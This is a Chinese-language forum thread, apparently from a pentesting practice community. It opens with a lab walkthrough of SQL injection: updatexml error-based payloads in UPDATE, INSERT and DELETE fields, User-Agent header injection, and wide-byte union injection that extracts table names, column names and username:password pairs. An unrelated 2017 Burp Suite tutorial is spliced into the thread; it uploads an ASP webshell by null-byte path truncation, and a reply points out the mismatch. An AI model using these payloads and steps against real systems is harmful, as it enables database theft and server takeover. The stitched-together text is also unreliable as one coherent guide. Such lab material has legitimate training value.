这几个分别是数据库的更新 插入 删除命令。相对于前面而言,略有难度。sqlmap直接跑是跑不出来的。需要我们手动构造相关指令。我们填写数据,点击提交后抓包。右键 Send To Repeater
获取数据库名
修改sex或者任意字段的值为下
' or updatexml(1,concat(0x7e,database()),0) or'
获取表名
' or updatexml(0,concat(0x7e,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='kali666')),0) or'
获取表中字段
' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2) or '
获取字段内容
' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),1) or'
delete
和上一步一样。抓包!爆出数据库:
or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆出表:
or updatexml(0,concat(0x7e,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='kali666')),0) or ''
列名:
or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2) or ''
http头注入
输入账号和密码抓包。我们将User-Agent的值设置为' 可以看到报错了。
爆出数据库
修改User-Agent的值为
firefox' or updatexml(1,concat(0x7e,database()),0) or '
如下,成功爆出数据库。
同样的方法,我们可以得到对应的字段内容。
基于boolian的盲注
数据库
%df' union select 1,database() %23
表
%df' union select 1,group_concat(table_name) from information_schema.columns where table_schema=database() %23
使用道具 举报
是的,封神台确实不错
使用道具 举报
使用道具 举报
mob604756f0e582
2017-01-05 16:04:00阅读 259
Burp Suite是一个免费的网站工具。
它包括proxy、spider、intruder、repeater四项功能。该程序使用Java写成,需要 JRE 1.4 以上版本
该程序的源代码,然后在本地部署以便测试。我本机的IP地址为192.168.8.120,演示程序地址为 http://192.168.8.120/test
方法/步骤
1 运行Burp site,点击Proxy标签,确认Options选项卡下,Proxy listeners的running运行正常(勾选状态为运行),如果端口打开失败,可能的原因是有程序占用了该端口,点击edit,在local listener port:输入框输入一个未占用的端口,点击update即可。我这里将端口改为了8082
2 打开http://192.168.8.120/test/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg,进入上传页面,选择我们的asp,然后设置浏览器代理地址为127.0.0.1,端口为8082,点击开始上传,burp suite截获数据包,点击forward按钮,返回结果如图所示。
3 到这里所用到的数据包已经成功捕获,切换到history选项卡,右键刚刚捕获的post数据包,选择send to repeater。
4 更改filepath值”bookpic/”为”bookpic/shell.asp “(asp后有一空格),然后把filename的值”C:\Documents andSettings\Administrator\Desktop\unset.asp”改成”C:\Documents andSettings\Administrator\Desktop\unset.jpg”,Content-Length的值不用更改,程序会在提交请求的时候自动更新该值。
5 然后切换到hex选项卡,找到上传路径”bookpic/shell.asp “所处位置,把20改成00,然后点击GO,成功上传aspshell到http://192.168.8.120/test/bookpic/shell.asp。
点评
使用道具 举报
不是讲sql注入吗 怎么传起小马来了
使用道具 举报